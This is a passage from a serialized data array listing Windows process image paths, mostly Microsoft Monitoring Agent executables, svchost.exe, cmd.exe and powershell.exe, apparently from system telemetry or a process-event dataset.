Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\c